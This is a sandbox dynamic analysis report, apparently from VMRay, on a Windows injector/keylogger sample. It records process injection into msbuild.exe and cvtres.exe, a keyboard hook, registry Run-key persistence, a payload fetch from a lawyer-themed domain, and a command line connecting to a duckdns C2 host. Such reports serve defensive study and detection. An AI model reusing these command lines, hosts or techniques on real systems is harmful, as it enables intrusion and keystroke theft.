
MALICIOUS DYNAMIC ANALYSIS REPORT # X-Ray Vision for Malware / 24. Classifications: Injector Keylogger.


MALICIOUS

Classifications: Injector Keylogger

Threat Names: -

Verdict Reason: -

Sample Type Windows Exe (x86-32)

File Name 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe

ID #1561912

MD5 e41f3d5033575c4f4cf2acd0d1d0624d

SHA1 18ff7a2ec479855e65ba2a83deeb917abed16ff9

SHA256 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5

File Size 17.50 KB

Report Created 2022-02-09 21:31 (UTC+1)

Target Environment win10_64_th2_en_mso2016 | exe


OVERVIEW

VMRay Threat Identifiers (15 rules, 26 matches)

Score Category Operation Count Classification

4/5 Execution Executes encoded PowerShell command 1 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe executes base64-encoded Powershell command.

4/5 Injection Writes into the memory of another process 2 Injector

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe modifies memory of (process #6) msbuild.exe.

(Process #6) msbuild.exe modifies memory of (process #8) cvtres.exe.

4/5 Injection Modifies control flow of another process 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe alters context of (process #6) msbuild.exe.

(Process #6) msbuild.exe alters context of (process #8) cvtres.exe.

3/5 Input Capture Monitors keyboard input 1 Keylogger

(Process #6) msbuild.exe installs system wide "WH_KEYBOARD_LL" hook(s) to monitor keystrokes.

2/5 Masquerade Creates a new process from a system binary 1 -

(Process #6) msbuild.exe creates a new explorer.exe process.

2/5 Network Connection File contains known DDNS domain 1 -

Embedded URL vncnew1984.duckdns.org leads to a host of dynamic DNS provider duckdns.org.

1/5 Hide Tracks Creates process with hidden window 5 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe starts (process #2) powershell.exe with a hidden window.

(Process #2) powershell.exe starts (process #4) cmd.exe with a hidden window.

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe starts (process #6) msbuild.exe with a hidden window.

(Process #6) msbuild.exe starts (process #7) explorer.exe with a hidden window.

(Process #6) msbuild.exe starts (process #8) cvtres.exe with a hidden window.

1/5 Privilege Escalation Enables process privilege 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe enables process privilege "SeDebugPrivilege".

(Process #6) msbuild.exe enables process privilege "SeDebugPrivilege".

1/5 Persistence Installs system startup script or application 1 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe adds ""C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe"" to Windows startup via registry.


1/5 Obfuscation Creates a page with write and execute permissions 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.

(Process #6) msbuild.exe allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.

1/5 Mutex Creates mutex 1 -

(Process #8) cvtres.exe creates mutex with name "ecZCILAfG".

1/5 Network Connection Performs DNS request 1 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe resolves host name "limanlimanlawyers.com" to IP "23.94.150.194".

1/5 Network Connection Connects to remote host 2 -

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe accepts an incoming TCP connection from host "23.94.150.194:443".

(Process #1) 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe opens an outgoing TCP connection to host "23.94.150.194:443".

Mitre ATT&CK Matrix

Initial Access: -

Execution: #T1086 PowerShell

Persistence: #T1060 Registry Run Keys / Startup Folder; #T1179 Hooking

Privilege Escalation: #T1179 Hooking

Defense Evasion: #T1143 Hidden Window; #T1112 Modify Registry; #T1045 Software Packing; #T1140 Deobfuscate/Decode Files or Information; #T1027 Obfuscated Files or Information

Credential Access: #T1056 Input Capture; #T1179 Hooking

Discovery: #T1057 Process Discovery

Lateral Movement: -

Collection: #T1056 Input Capture

Command and Control: -

Exfiltration: -

Impact: -

Sample Information

ID: #1561912
MD5: e41f3d5033575c4f4cf2acd0d1d0624d
SHA1: 18ff7a2ec479855e65ba2a83deeb917abed16ff9
SHA256: 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5
SSDeep: 384:eBAiyJNFVJU14KU6nX2D+bFQkNubvg+4OXEW46njPHoWWDDDDDDDDDDN:iGFwWp6nnb+/XjDjYDDDDDDDDDDN
ImpHash: f34d5f2d4577ed6d9ceec516c1f5a744
File Name: 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe
File Size: 17.50 KB
Sample Type: Windows Exe (x86-32)
Has Macros:

Analysis Information

Creation Time: 2022-02-09 21:31 (UTC+1)
Analysis Duration: 00:04:00
Termination Reason: Timeout
Number of Monitored Processes: 7
Execution Successful: False
Reputation: Enabled
WHOIS: Enabled
Built-in AV: Enabled
Built-in AV Applied On: Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of AV Matches: 0
YARA: Enabled
YARA Applied On: Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files
Number of YARA Matches: 0

Screenshots truncated


NETWORK

General

3.56 KB total sent
1048.75 KB total received
1 ports (443)
2 contacted IP addresses
1 URLs extracted
0 files downloaded
0 malicious hosts detected

DNS

1 DNS requests for 1 domains
1 nameservers contacted
0 total requests returned errors

HTTP/S

1 URLs contacted, 1 servers
1 sessions, 3.56 KB sent, 1048.75 KB received

HTTP Requests

Method | URL | Dest. IP | Dest. Port | Status Code | Response Size | Verdict
 | vncnew1984.duckdns.org | - | - | | 0 bytes | NA
GET | https://limanlimanlawyers.com/cv/Jikte.jpg | - | - | | 0 bytes | NA

DNS Requests

Type | Hostname | Response Code | Resolved IPs | CNames | Verdict
A | limanlimanlawyers.com | NoError | 23.94.150.194 | | NA

BEHAVIOR

Process Graph

#1 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe (Sample Start)
  #2 powershell.exe (Child Process)
    #4 cmd.exe (Child Process)
      #5 timeout.exe (Child Process)
  #6 msbuild.exe (Child Process; Modify Memory; Modify Control Flow)
    #7 explorer.exe (Child Process)
    #8 cvtres.exe (Child Process; Modify Memory; Modify Control Flow)

Process #1: 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe

ID: 1
File Name: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe
Command Line: "C:\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe"
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 70955 (Reason: Analysis Target)
Unmonitor End Time: 238185 (Reason: Terminated)
Monitor Duration: 167.23s
Return Code: 0
PID: 240
Parent PID: 1676
Bitness: 32 Bit

Dropped Files (1)

File Name | File Size | SHA256 | YARA Match
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe | 17.50 KB | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5 |

Host Behavior

Type | Count
- | 10
Registry | 27
Process | 105
File | 26
System | 111
Environment | 10
Module | 31
User | 2
- | 3
- | 7

Network Behavior

Type | Count
HTTPS | 1
DNS | 1
TCP | 1

Process #2: powershell.exe

ID: 2
File Name: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAEMAIAB0AGkAbQBlAG8AdQB0ACAAMgAyAA==
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 113706 (Reason: Child Process)
Unmonitor End Time: 182521 (Reason: Terminated)
Monitor Duration: 68.81s
Return Code: 0
PID: 1592
Parent PID: 240
Bitness: 32 Bit

Host Behavior

Type | Count
Module | 5
File | 31
Environment | 14
Registry | 2
Process | 1
- | 13

Process #4: cmd.exe

ID: 4
File Name: c:\windows\syswow64\cmd.exe
Command Line: "C:\Windows\system32\cmd.exe" /C timeout 22
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 158620 (Reason: Child Process)
Unmonitor End Time: 181868 (Reason: Terminated)
Monitor Duration: 23.25s
Return Code: 0
PID: 5100
Parent PID: 1592
Bitness: 32 Bit

Host Behavior

Type | Count
Module | 8
Registry | 17
File | 18
Environment | 19
System | 1
Process | 1

Process #5: timeout.exe

ID: 5
File Name: c:\windows\syswow64\timeout.exe
Command Line: timeout 22
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 158969 (Reason: Child Process)
Unmonitor End Time: 181862 (Reason: Terminated)
Monitor Duration: 22.89s
Return Code: 0
PID: 3256
Parent PID: 5100
Bitness: 32 Bit

Host Behavior

Type | Count
Module | 2
System | 343
File | 154

Process #6: msbuild.exe

ID: 6
File Name: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
Command Line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 234334 (Reason: Child Process)
Unmonitor End Time: 274863 (Reason: Terminated)
Monitor Duration: 40.53s
Return Code: 1073807364
PID: 5056
Parent PID: 240
Bitness: 32 Bit

Injection Information (6)

Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count
Modify Memory | #1: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | 0xd14 | 0x400000 (4194304) | 0x200 | 1
Modify Memory | #1: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | 0xd14 | 0x402000 (4202496) | 0x59e00 | 1
Modify Memory | #1: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | 0xd14 | 0x45c000 (4571136) | 0x1200 | 1
Modify Memory | #1: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | 0xd14 | 0x45e000 (4579328) | 0x200 | 1
Modify Memory | #1: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | 0xd14 | 0x34d008 (3461128) | 0x4 | 1
Modify Control Flow | #1: c:\users\rdhj0cnfevzx\desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | 0xd14 / 0x10bc | - | | 1

Dropped Files (1)

File Name | File Size | SHA256 | YARA Match
C:\Users\RDhJ0CNFevzX\AppData\Roaming\tempp4nd0r4 | 28 bytes | 0429aad3007c2d9b26ed655f02e94545ba94bd4caa95e510c3ad163747ca725b |

Host Behavior

Type | Count
System | 11
Module | 27
File | 5
- | 3
- | 7
Registry | 3
Keyboard | 5

Process #7: explorer.exe

ID: 7
File Name: c:\windows\explorer.exe
Command Line: "C:\Windows\explorer.exe"
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 240353 (Reason: Child Process)
Unmonitor End Time: 242866 (Reason: Terminated)
Monitor Duration: 2.51s
Return Code: 2
PID: 4296
Parent PID: 5056
Bitness: 64 Bit

Process #8: cvtres.exe

ID: 8
File Name: c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
Command Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG
Initial Working Directory: C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time: 241001 (Reason: Child Process)
Unmonitor End Time: 268271 (Reason: Terminated)
Monitor Duration: 27.27s
Return Code: 1073807364
PID: 4996
Parent PID: 5056
Bitness: 32 Bit

Injection Information (6)

Injection Type | Source Process | Source / Target TID | Address / Name | Size | Success Count
Modify Memory | #6: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe | 0x10bc | 0x400000 (4194304) | 0x200 | 1
Modify Memory | #6: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe | 0x10bc | 0x402000 (4202496) | 0xe600 | 1
Modify Memory | #6: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe | 0x10bc | 0x412000 (4268032) | 0x600 | 1
Modify Memory | #6: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe | 0x10bc | 0x414000 (4276224) | 0x200 | 1
Modify Memory | #6: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe | 0x10bc | 0x243008 (2371592) | 0x4 | 1
Modify Control Flow | #6: c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe | 0x10bc / 0xf68 | - | | 1

Host Behavior

Type | Count
File | 24
Registry | 2
Module | 18
Mutex | 1

ARTIFACTS

File

SHA256 | File Names | Category | File Size | MIME Type | Operations | Verdict
4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5 | C:\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe, C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe | Sample File | 17.50 KB | application/vnd.microsoft.portable-executable | Access, Write, Create | MALICIOUS
0429aad3007c2d9b26ed655f02e94545ba94bd4caa95e510c3ad163747ca725b | C:\Users\RDhJ0CNFevzX\AppData\Roaming\tempp4nd0r4 | Dropped File | 28 bytes | text/plain | Access, Write, Create | CLEAN

Filename

File Name | Category | Operations | Verdict
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | Accessed File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe.config | Accessed File | Access | CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Accessed File | Access | CLEAN
C:\Windows\system32 | Accessed File | Access | CLEAN
C:\Windows\system32\cmd.exe | Accessed File | Access | CLEAN
C:\Windows\SysWOW64\cmd.exe | Accessed File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\Desktop | Accessed File | Access | CLEAN
C:\Windows\SysWOW64\timeout.exe | Accessed File | Access | CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | Accessed File | Access | CLEAN
System Paging File | Accessed File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | Sample File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo | Accessed File | Access, Create | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming | Accessed File | Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Demo\Test.exe | Sample File | Access, Write, Create | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Accessed File | Access | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ | Accessed File | Access | CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.Config | Accessed File | Read, Access | CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\tempp4nd0r4 | Dropped File | Access, Write, Create | CLEAN

Domain

Domain | IP Address | Country | Protocols | Verdict
vncnew1984.duckdns.org | - | - | HTTP | SUSPICIOUS
limanlimanlawyers.com | 23.94.150.194 | - | DNS, HTTPS | CLEAN

IP

IP Address | Domains | Country | Protocols | Verdict
192.168.0.1 | - | - | UDP, DNS | CLEAN
23.94.150.194 | limanlimanlawyers.com | United States | DNS, TCP, HTTPS | CLEAN

Mutex

Name | Operations | Parent Process Name | Verdict
ecZCILAfG | access | cvtres.exe | CLEAN

Registry

Registry Key | Operations | Parent Process Name | Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\InstallationType | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | access | powershell.exe | CLEAN
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | access | powershell.exe | CLEAN
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DisableUNCCheck | read, access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions | read, access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion | read, access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DefaultColor | read, access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar | read, access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar | read, access | cmd.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor | access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar | read, access | cmd.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun | read, access | cmd.exe | CLEAN
HKEY_PERFORMANCE_DATA | access | powershell.exe, 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_CURRENT_USER | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\TZI | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Display | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Std | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Dlt | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind | read, access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run | access | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Test | read, access, write | 4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | access | msbuild.exe | CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgJITDebugLaunchSetting | read, access | msbuild.exe | CLEAN

Process

Process Name | Commandline | Verdict
4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe | "C:\Users\RDhJ0CNFevzX\Desktop\4c4d844ace41156600bf0c2ab9df287538002abf30d0ba3f50836b2e49f5e0a5.exe" | MALICIOUS
powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc YwBtAGQAIAAvAEMAIAB0AGkAbQBlAG8AdQB0ACAAMgAyAA== | SUSPICIOUS
msbuild.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | SUSPICIOUS
explorer.exe | "C:\Windows\explorer.exe" | SUSPICIOUS
cmd.exe | "C:\Windows\system32\cmd.exe" /C timeout 22 | CLEAN
timeout.exe | timeout 22 | CLEAN
cvtres.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client vncnew1984.duckdns.org 1984 ecZCILAfG | CLEAN

YARA / AV

No YARA or AV matches available.


ENVIRONMENT

Virtual Machine Information

Name: win10_64_th2_en_mso2016
Description: win10_64_th2_en_mso2016
Architecture: x86 64-bit
Operating System: Windows 10 Threshold 2
Kernel Version: 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)
Network Scheme Name: Local Gateway
Network Config Name: Local Gateway

Platform Information

Platform Version: 4.4.1
Dynamic Engine Version: 4.4.1 / 01/14/2022 05:06
Static Engine Version: 4.4.1.0 / 2022-01-14 04:00:58
AV Exceptions Version: 4.4.1.6 / 2021-12-14 15:06:27
Link Detonation Heuristics Version: 4.4.1.7 / 2021-12-15 19:11:26
Smart Memory Dumping Rules Version: 4.4.1.6 / 2021-12-14 15:06:27
Signature Trust Store Version: 4.4.1.6 / 2021-12-14 15:06:27
VMRay Threat Identifiers Version: 4.4.1.8 / 2022-01-07 14:24:33
YARA Built-in Ruleset Version: 4.4.1.10

Anti Virus Information

Built-in AV Version: AVCORE v2.2 Linux/x86_64 11.0.1.19 (March 15, 2021)
Built-in AV Database Update Release Date: 2022-02-09 15:45:26+00:00
Built-in AV Database Records: 11128487

Software Information

Adobe Acrobat Reader Version: Not installed
Microsoft Office: 2016
Microsoft Office Version: 16.0.4266.1003
Hangul Office: Not installed
Hangul Office Version: Not installed
Internet Explorer Version: 11.0.10586.0
Chrome Version: Not installed
Firefox Version: Not installed
Flash Version: Not installed
Java Version: Not installed

System Information

Sample Directory: C:\Users\RDhJ0CNFevzX\Desktop
Computer Name: XC64ZB
User Domain: XC64ZB
User Name: RDhJ0CNFevzX
User Profile: C:\Users\RDhJ0CNFevzX
Temp Directory: C:\Users\RDHJ0C~1\AppData\Local\Temp
System Root: C:\Windows